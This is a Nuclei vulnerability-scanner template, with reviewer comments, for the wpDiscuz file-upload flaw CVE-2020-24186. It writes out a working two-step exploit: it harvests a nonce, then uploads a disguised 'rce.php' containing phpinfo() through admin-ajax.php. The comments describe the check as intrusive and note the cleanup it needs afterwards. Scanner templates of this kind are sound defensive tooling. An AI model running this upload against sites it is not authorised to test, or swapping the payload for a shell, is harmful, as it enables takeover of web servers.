# Nuclei template for CVE-2020-24186 (wpDiscuz <= 7.0.4 unauthenticated arbitrary
# file upload, CWE-434). Two requests: the first harvests the wpDiscuz upload nonce
# from a post page, the second uploads a PHP file through admin-ajax.php.
#
# NOTE(review): this check is INTRUSIVE (see tags) — on a vulnerable target it
# stores a real PHP file (`rce.php`, body `<?php phpinfo();?>`) under the site's
# upload directory. phpinfo() exposes server configuration to anyone who can reach
# the file, so the URL returned by the second extractor must be used to remove the
# artifact after the scan. Do not run this against systems you are not authorized
# to modify.
id: CVE-2020-24186

info:
  name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
  author: Ganofins
  severity: critical
  description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
  impact: |
    Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
  remediation: |
    Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
  reference:
    - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
    - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
    - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-24186
    cwe-id: CWE-434
    epss-score: 0.97374
    epss-percentile: 0.99893
    cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
  metadata:
    # Exactly two requests are sent; no follow-up request verifies that the
    # uploaded file actually executes (see the second extractor below).
    max-request: 2
    vendor: gvectors
    product: wpdiscuz
    framework: wordpress
  tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive,gvectors

http:
  - raw:
      # Request 1: fetch post ID 1. The `wmuSecurity` internal extractor below pulls
      # the upload nonce out of this response body. If the page does not embed the
      # wpDiscuz script (e.g. comments disabled on post 1, or no post 1), no nonce is
      # extracted and `{{wmuSecurity}}` is sent literally in request 2, which should
      # simply fail the matcher rather than produce a finding — TODO confirm on a
      # non-vulnerable host.
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      # Request 2: multipart upload via the `wmuUploadFiles` AJAX action. The part
      # named `wmu_files[0]` is sent with filename `rce.php` and a declared
      # `Content-Type: image/png`, but its body starts with the base64-decoded bytes
      # `/9j/4...` = FF D8 FF E1 (a JPEG/EXIF header) followed by the PHP payload.
      # The PNG/JPEG disagreement is carried over from the referenced PoC —
      # presumably the vulnerable version sniffs the file content rather than the
      # declared type; do not "correct" either side without re-testing.
      # `postId` 1 matches the `/?p=1` page the nonce was taken from.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="action"

        wmuUploadFiles
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_nonce"

        {{wmuSecurity}}
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmuAttachmentsData"

        undefined
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
        Content-Type: image/png

        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
        <?php phpinfo();?>
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="postId"

        1
        ------WebKitFormBoundary88AhjLimsDMHU1Ak--

    # Both matchers must pass. admin-ajax.php typically answers 200 even for
    # rejected actions, so the status matcher alone is weak; the decisive signal is
    # the success JSON with the upload metadata keys below. A match means the
    # server ACCEPTED and STORED the file, not that PHP in the upload directory is
    # executable — an uploads .htaccess or server rule can block execution while
    # this template still reports critical.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - 'fullname'
          - 'shortname'
          - 'url'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      # Internal (not reported) extractor: captures the nonce from request 1's
      # body for use as `{{wmuSecurity}}` in request 2.
      - type: regex
        name: wmuSecurity
        group: 1
        regex:
          - 'wmuSecurity":"([a-z0-9]+)'
        internal: true
        part: body

      # Reported extractor: the stored file's URL from the upload JSON. Use it to
      # (a) confirm execution by fetching it and (b) delete the phpinfo() file
      # afterwards. The character class is lowercase-only and has no `_`, so a
      # path or host containing uppercase letters or underscores would be
      # truncated at that character; `\\/` matches the JSON-escaped `\/`.
      - type: regex
        group: 1
        regex:
          - '"url":"([a-z:\\/0-9-.]+)"'
        part: body
# Signature over the template content. Any edit to this file — including comment
# changes — invalidates it; re-sign (nuclei template signing) before distributing,
# otherwise presumably nuclei will treat the template as unsigned/modified.
# digest: 4b0a00483046022100bdd143584a6efd782ae28deeb8dd9169435a636d74426a655bc5c3762804514c0221008a062ba0f6be77b63fa1e85d870025f5c2cbfd1bbd98caabc9a3f407a46ce2bf:922c64590222798bb761d5b6d8e72950